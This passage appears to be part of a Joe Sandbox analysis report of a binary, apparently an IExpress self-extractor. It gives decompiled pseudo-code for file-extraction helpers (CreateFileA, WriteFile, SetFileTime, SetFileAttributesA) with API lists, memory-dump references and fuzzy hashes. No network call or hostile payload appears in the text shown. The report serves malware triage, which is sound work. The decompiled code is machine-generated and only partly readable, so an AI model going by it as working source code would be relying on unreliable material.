					if(_t44 == 0) {
						_t54 = 0x291e4;
						_t63 = 0x291e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x291e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x291e4;
						_t30 = E00024702( &_v268, 0x291e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00024C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00024B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t33 = 1;
                                                                                                                                                                                                                                                							goto L35;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t30 = _t44 - 1;
                                                                                                                                                                                                                                                					__eflags = _t30;
                                                                                                                                                                                                                                                					if(_t30 == 0) {
                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_a4 == 3) {
                                                                                                                                                                                                                                                					_t30 = E00024B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L3;
                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                0x00024d7c
                                                                                                                                                                                                                                                0x00024d84
                                                                                                                                                                                                                                                0x00024d89
                                                                                                                                                                                                                                                0x00024d8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024d94
                                                                                                                                                                                                                                                0x00024d99
                                                                                                                                                                                                                                                0x00024d9e
                                                                                                                                                                                                                                                0x00024da1
                                                                                                                                                                                                                                                0x00024daa
                                                                                                                                                                                                                                                0x00024daa
                                                                                                                                                                                                                                                0x00024da3
                                                                                                                                                                                                                                                0x00024da3
                                                                                                                                                                                                                                                0x00024da3
                                                                                                                                                                                                                                                0x00024db5
                                                                                                                                                                                                                                                0x00024dbb
                                                                                                                                                                                                                                                0x00024dbd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024dc3
                                                                                                                                                                                                                                                0x00024dc5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024dc5
                                                                                                                                                                                                                                                0x00024dbd
                                                                                                                                                                                                                                                0x00024d2a
                                                                                                                                                                                                                                                0x00024d2a
                                                                                                                                                                                                                                                0x00024d2d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024d2d
                                                                                                                                                                                                                                                0x00024cf8
                                                                                                                                                                                                                                                0x00024cfd
                                                                                                                                                                                                                                                0x00024d02
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00024DB5
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00024DDD
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFileItemText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                • API String ID: 3625706803-1116576409
                                                                                                                                                                                                                                                • Opcode ID: da16abfd7491fa916cbcaa1754b60cf03c6122da94f04ae4c136609a9f13f4fe
                                                                                                                                                                                                                                                • Instruction ID: 447634786b9788c2f9bc02f3e0d40f80f58e596fe0eb1b8f48cec0305a307053
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da16abfd7491fa916cbcaa1754b60cf03c6122da94f04ae4c136609a9f13f4fe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 264145362041218BCF719F38FC446F973E5EB45300F148668E89697292DF72DE8ACB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00024C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                                				struct _FILETIME _v12;
                                                                                                                                                                                                                                                				struct _FILETIME _v20;
                                                                                                                                                                                                                                                				FILETIME* _t14;
                                                                                                                                                                                                                                                				int _t15;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t21 + 0x28d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t14 =  &_v12;
                                                                                                                                                                                                                                                					_t15 = SetFileTime( *(_t21 + 0x28d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                                					if(_t15 == 0) {
                                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DosDateTimeToFileTime.KERNEL32 ref: 00024C54
                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00024C66
                                                                                                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00024C7E
                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2071732420-0
                                                                                                                                                                                                                                                • Opcode ID: df42948ae0974a2930cff98e5e6616f6866b961df0d9c49f18d3dd78512688bd
                                                                                                                                                                                                                                                • Instruction ID: f00e772a25b29707d6673416800e1fb6e10e3dfb8128f624a2dafa944aaee0ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df42948ae0974a2930cff98e5e6616f6866b961df0d9c49f18d3dd78512688bd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CF0907260122CAFABA5DFB8EC49DFBB7ECEF05350B54453AE816C1050EA34E914C7A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E0002487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                                				CHAR* _t11;
                                                                                                                                                                                                                                                				long _t18;
                                                                                                                                                                                                                                                				long _t23;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t11 = __ecx;
                                                                                                                                                                                                                                                				asm("sbb edi, edi");
                                                                                                                                                                                                                                                				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                                				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                                					asm("sbb esi, esi");
                                                                                                                                                                                                                                                					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                                						asm("sbb esi, esi");
                                                                                                                                                                                                                                                						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t23 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                                				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                                					return _t7;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E0002490C(_t11);
                                                                                                                                                                                                                                                					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00024A23,?,00024F67,*MEMCAB,00008000,00000180), ref: 000248DE
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00024F67,*MEMCAB,00008000,00000180), ref: 00024902
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: f62bf058170c9a0b17c325c42d305daf255336e39c6c2a514540c2338e97fee5
                                                                                                                                                                                                                                                • Instruction ID: 5a114de96ffb24289ac2cac785f7ffc83196384f3dbca4de9162fc202e203d96
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f62bf058170c9a0b17c325c42d305daf255336e39c6c2a514540c2338e97fee5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76014BA3E2157026F3744129AC88FBB555CCB9A734F2B1335BDAAE71D2D9644C4481E0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00024AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				int _t12;
                                                                                                                                                                                                                                                				signed int _t14;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				struct HWND__* _t21;
                                                                                                                                                                                                                                                				signed int _t24;
                                                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 =  *0x2858c; // 0x268
                                                                                                                                                                                                                                                				_t9 = E00023680(_t20);
                                                                                                                                                                                                                                                				if( *0x291d8 == 0) {
                                                                                                                                                                                                                                                					_push(_t24);
                                                                                                                                                                                                                                                					_t12 = WriteFile( *(0x28d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						_t25 = _a12;
                                                                                                                                                                                                                                                						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                							_t14 =  *0x29400; // 0xc1c00
                                                                                                                                                                                                                                                							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                                							 *0x29400 = _t15;
                                                                                                                                                                                                                                                							if( *0x28184 != 0) {
                                                                                                                                                                                                                                                								_t21 =  *0x28584; // 0x0
                                                                                                                                                                                                                                                								if(_t21 != 0) {
                                                                                                                                                                                                                                                									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x293f8, 0);
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return _t25;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                                0x00024b2f
                                                                                                                                                                                                                                                0x00024b0f
                                                                                                                                                                                                                                                0x00024b0f
                                                                                                                                                                                                                                                0x00024b0f
                                                                                                                                                                                                                                                0x00024b5e
                                                                                                                                                                                                                                                0x00024ae9
                                                                                                                                                                                                                                                0x00024aed
                                                                                                                                                                                                                                                0x00024aed

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00023680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0002369F
                                                                                                                                                                                                                                                  • Part of subcall function 00023680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000236B2
                                                                                                                                                                                                                                                  • Part of subcall function 00023680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000236DA
                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00024B05
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1084409-0
                                                                                                                                                                                                                                                • Opcode ID: cfd3a6b4c33d0607fd285670ba1386df75777f6dabe30237ef21213b6297e05e
                                                                                                                                                                                                                                                • Instruction ID: 2f8107840ac9f9c8d2091bb821f9a861035c7ea6d9676e1170b61eefad9823c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfd3a6b4c33d0607fd285670ba1386df75777f6dabe30237ef21213b6297e05e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8019E31201221ABEB258F68EC05BA67799FB45725F24C225F939971F0CB74D856CB90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E0002658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                                                                				char* _t6;
                                                                                                                                                                                                                                                				char* _t8;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				char* _t16;
                                                                                                                                                                                                                                                				intOrPtr* _t17;
                                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                                				char* _t19;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t16 = __ecx;
                                                                                                                                                                                                                                                				_t10 = __edx;
                                                                                                                                                                                                                                                				_t17 = __ecx;
                                                                                                                                                                                                                                                				_t1 = _t17 + 1; // 0x28b3f
                                                                                                                                                                                                                                                				_t12 = _t1;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t4 =  *_t17;
                                                                                                                                                                                                                                                					_t17 = _t17 + 1;
                                                                                                                                                                                                                                                				} while (_t4 != 0);
                                                                                                                                                                                                                                                				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                                				_t2 = _t18 + 1; // 0x28b40
                                                                                                                                                                                                                                                				if(_t2 < __edx) {
                                                                                                                                                                                                                                                					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                                					if(_t19 > __ecx) {
                                                                                                                                                                                                                                                						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                                						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                                							 *_t19 = 0x5c;
                                                                                                                                                                                                                                                							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t6 = _a4;
                                                                                                                                                                                                                                                					 *_t19 = 0;
                                                                                                                                                                                                                                                					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                                						_t6 = _t6 + 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return E000216B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0x8007007a;
                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(00028B3E,00028B3F,00000001,00028B3E,-00000003,?,000260EC,00021140,?), ref: 000265BA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharPrev
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 122130370-0
                                                                                                                                                                                                                                                • Opcode ID: 8502a07590d0bce1220392503cec93633566f244086240fd91309f2fa786e82f
                                                                                                                                                                                                                                                • Instruction ID: b38ba3fb60df9b44a2e4e04a7105f5d4aca98cb7ee90f7c760a62d3a39439f25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8502a07590d0bce1220392503cec93633566f244086240fd91309f2fa786e82f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F042321046709BD331051DB884BABBFDD9B86350F28015FE8DAC3205CA674D4583A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0002621E() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t5 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                					0x4f0 = 2;
                                                                                                                                                                                                                                                					_t9 = E0002597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E000244B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                                					 *0x29124 = E00026285();
                                                                                                                                                                                                                                                					_t9 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0002623F
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                  • Part of subcall function 00026285: GetLastError.KERNEL32(00025BBC), ref: 00026285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 381621628-0
                                                                                                                                                                                                                                                • Opcode ID: 44c079092130105075be7152bcb544e050faca65ed24f4648635ff216a42b6d0
                                                                                                                                                                                                                                                • Instruction ID: a8d21bffb2c423a53cdce755cbc2746862f300f0fd45757bc56aed13269cf09e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44c079092130105075be7152bcb544e050faca65ed24f4648635ff216a42b6d0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68F0E9B0700218ABE760FB74AD02FFE73ACDB44700F504069B985D7082DD759D458750
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00024B60(signed int _a4) {
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t15 + 0x28d64)) != 1) {
                                                                                                                                                                                                                                                					_t7 = _t15 + 0x28d74; // 0x263e8d1f, executed
                                                                                                                                                                                                                                                					_t9 = FindCloseChangeNotification( *_t7); // executed
                                                                                                                                                                                                                                                					if(_t9 == 0) {
                                                                                                                                                                                                                                                						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *((intOrPtr*)(_t15 + 0x28d60)) = 1;
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x28d60)) = 1;
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x28d68)) = 0;
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x28d70)) = 0;
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x28d6c)) = 0;
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(263E8D1F,00000000,00000000,?,00024FA1,00000000), ref: 00024B98
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000266AE(CHAR* __ecx) {
                                                                                                                                                                                                                                                				unsigned int _t1;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                                				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                                					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00024777,?,00024E38,?), ref: 000266B1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00024CA0(long _a4) {
                                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                                			}





